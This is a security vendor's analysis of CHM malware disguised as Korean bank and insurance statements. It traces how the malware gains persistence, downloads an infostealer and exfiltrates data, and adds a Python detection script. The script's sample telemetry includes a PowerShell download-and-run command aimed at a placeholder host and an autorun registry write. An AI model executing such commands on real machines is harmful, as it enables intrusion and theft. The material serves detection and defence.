AhnLab Security Emergency response Center (ASEC) previously covered CHM-type malware strains impersonating security companies and financial institutions. This post covers recently identified CHM strains impersonating Korean financial institutions and insurance companies, which were found being distributed to steal information. The distribution took place on the 17th (Monday), the day on which statements are regularly sent to users whose payments to financial institutions fall due on the 25th of each month. Users on the same payment schedule could easily mistake the file for a genuine statement and execute it. AhnLab’s EDR products record in detail what happens when such new malware strains are run after a user is deceived, so the extent of the damage and the exfiltrated files can also be identified.
This post describes the distribution method and the details of the CHM malware, and explains how AhnLab’s EDR product records the chain from the malware being executed from the CHM file through to the Infostealer’s exfiltration behavior.
Figure 1 shows the EDR detection diagram produced when the CHM-type malware was executed. hh.exe is a legitimate Windows program, the process that opens Windows Help files (*.CHM). The process tree that follows shows the relationship between CMD, the script and command interface process, and alg.exe, the Infostealer.
Figure 2 shows the behavior detection of the CHM file being decompiled into the “C:\Users\Public\Libraries” path mentioned in the earlier blog post, together with the command line used for the decompilation.
Figure 3 shows the command line that runs “Docs.jse”, the file created by the decompilation, with wscript. Its content is the same as the script covered in the earlier blog post.
Figure 4 shows the detection of the malicious behaviors of the executed wscript. It adds a registry key for persistence. The name and data added to the registry are recorded, and these details can be used to take measures against reinfection. After registering itself in autorun, it launches the command line interface cmd with a script; examining that command line shows that PowerShell is used to download the malware strain from the distribution site into the TEMP path and run it with the start command.
Figure 5 shows the EDR behavior detection screen for the downloaded Infostealer, and Figure 6 shows the decompiled code of this malware strain. It is comparatively small and exfiltrates data such as user PC, directory, and browser information. It can also send the stolen data as a compressed file. As shown in the AhnLab EDR product’s detection details (see Figure 5), the compressed file containing the stolen data is created in the Public\Pictures path, and the exfiltrated information is then transmitted to the threat actor’s server.
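As an added illustration, and not AhnLab’s code or the EDR product’s own detection logic, the following Python script walks constructed endpoint telemetry and flags each stage of the chain the figures describe: the Help viewer spawning a shell, decompilation into C:\Users\Public\Libraries (the documented hh.exe -decompile switch is assumed as the mechanism), wscript running a .jse from that folder, the script host writing an autorun registry value, PowerShell downloading into TEMP and starting the payload, and an archive appearing in Public\Pictures. The event field names, the Run key location and value name, the URL, and every file name in the sample events are assumptions constructed for the example; none of them are indicators from the post.

```python
"""Walk constructed endpoint telemetry and flag each stage of the CHM chain.

Added example, not AhnLab's code or the EDR product's own detection logic.
Event field names (type, parent, image, cmdline, key, data, path) and every
sample value below are assumptions constructed for illustration; none of the
file names, the registry value name or the URL are indicators from the post.
"""
import re
from typing import Dict, List, Tuple

PUBLIC_LIB = r"\users\public\libraries"   # decompile target named in the post
PUBLIC_PIC = r"\users\public\pictures"    # where the stolen-data archive is staged
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
ARCHIVE_EXT = (".zip", ".rar", ".7z", ".cab")
# A script launched from Public\Libraries, e.g. "...\Docs.jse" (extension list is an assumption)
SCRIPT_IN_PUBLIC_LIB = re.compile(r"\\users\\public\\libraries\\[^\s\"]+\.(jse|js|vbs|vbe|wsf)\b")
DOWNLOAD_VERBS = re.compile(r"\b(invoke-webrequest|iwr|downloadfile|downloadstring|start-bitstransfer)\b")

# Constructed telemetry following the stages the post describes (hh.exe -> cmd ->
# wscript Docs.jse -> autorun value -> cmd/PowerShell download -> alg.exe -> archive).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "process", "parent": "explorer.exe", "image": "hh.exe",
     "cmdline": r'"C:\Windows\hh.exe" C:\Users\victim\Downloads\statement_sample.chm'},
    {"type": "process", "parent": "hh.exe", "image": "cmd.exe",
     "cmdline": r"cmd /c hh.exe -decompile C:\Users\Public\Libraries C:\Users\victim\Downloads\statement_sample.chm"},
    {"type": "process", "parent": "cmd.exe", "image": "wscript.exe",
     "cmdline": r"wscript C:\Users\Public\Libraries\Docs.jse"},
    {"type": "registry", "image": "wscript.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DocsUpdate",  # placeholder value name
     "data": r"wscript C:\Users\Public\Libraries\Docs.jse"},
    {"type": "process", "parent": "wscript.exe", "image": "cmd.exe",
     "cmdline": r'cmd /c powershell -c "Invoke-WebRequest http://distribution-site.invalid/f -OutFile $env:TEMP\alg.exe; start $env:TEMP\alg.exe"'},
    {"type": "process", "parent": "cmd.exe", "image": "alg.exe",
     "cmdline": r"C:\Users\victim\AppData\Local\Temp\alg.exe"},
    {"type": "file", "image": "alg.exe", "path": r"C:\Users\Public\Pictures\collected.zip"},
]

# Constructed benign activity that should not trigger any rule.
BENIGN_EVENTS: List[Dict[str, str]] = [
    {"type": "process", "parent": "explorer.exe", "image": "hh.exe",
     "cmdline": r'"C:\Windows\hh.exe" "C:\Program Files\Vendor\manual.chm"'},
    {"type": "process", "parent": "explorer.exe", "image": "wscript.exe",
     "cmdline": r'wscript "C:\Program Files\Vendor\setup.vbs"'},
    {"type": "file", "image": "explorer.exe", "path": r"C:\Users\victim\Pictures\holiday.zip"},
]


def _low(event: Dict[str, str], field: str) -> str:
    """Lower-cased field value, empty if the event lacks it."""
    return event.get(field, "").lower()


def analyse(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (stage, responsible image) pairs in the order the events arrive."""
    findings: List[Tuple[str, str]] = []
    for ev in events:
        kind, image, parent, cmd = ev.get("type"), _low(ev, "image"), _low(ev, "parent"), _low(ev, "cmdline")
        if kind == "process":
            # Stage 1: the Help viewer has no business spawning a shell or script host.
            if parent == "hh.exe" and image in SHELLS:
                findings.append(("help-viewer-spawns-shell", image))
            # Stage 2: a CHM decompiled into the world-writable Public\Libraries folder.
            if "decompile" in cmd and PUBLIC_LIB in cmd:
                findings.append(("chm-decompile-to-public", image))
            # Stage 3: a script host executing a script dropped there.
            if image in SCRIPT_HOSTS and SCRIPT_IN_PUBLIC_LIB.search(cmd):
                findings.append(("script-from-public-libraries", image))
            # Stage 5: PowerShell fetches into TEMP and immediately starts the result.
            if ("powershell" in cmd and DOWNLOAD_VERBS.search(cmd)
                    and ("\\temp\\" in cmd or "$env:temp" in cmd) and re.search(r"\bstart\b", cmd)):
                findings.append(("powershell-download-to-temp-and-start", image))
        elif kind == "registry":
            # Stage 4: persistence, a script host writing an autorun value.
            if image in SCRIPT_HOSTS and r"\currentversion\run" in _low(ev, "key"):
                findings.append(("script-host-autorun-write", image))
        elif kind == "file":
            # Stage 6: stolen data compressed and staged in Public\Pictures.
            path = _low(ev, "path")
            if PUBLIC_PIC in path and path.endswith(ARCHIVE_EXT):
                findings.append(("archive-staged-in-public-pictures", image))
    return findings


def distinct_stages(events: List[Dict[str, str]]) -> int:
    """Number of different chain stages observed; several together is strong evidence."""
    return len({stage for stage, _ in analyse(events)})


if __name__ == "__main__":
    for stage, image in analyse(SAMPLE_EVENTS):
        print(f"{stage:40s} {image}")
    print("distinct stages:", distinct_stages(SAMPLE_EVENTS))
```

The rules are keyed on the parent/child relationships and the Public folder locations the post names rather than on file names or hashes, so renaming Docs.jse or alg.exe does not evade them; in a real deployment each rule would map to its telemetry source (process creation, registry write, file creation) and the number of distinct stages seen on one host would drive the severity.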
Beyond the details discussed above, AhnLab EDR records further information that helps track what was stolen and where it was sent, as well as how the malware strain came to be executed. Distributing malware disguised as statements timed to financial institutions’ payment schedules is an effective way to lead users into a mistake. AhnLab’s EDR products can be used to check for such threats, where a single mistake can cause harm, and the detection details can be used to form a response.
AhnLab EDR protects the endpoint environment by delivering behavioral detection, advanced analysis, holistic visibility, and proactive threat hunting. For more information about the product, please visit our official website.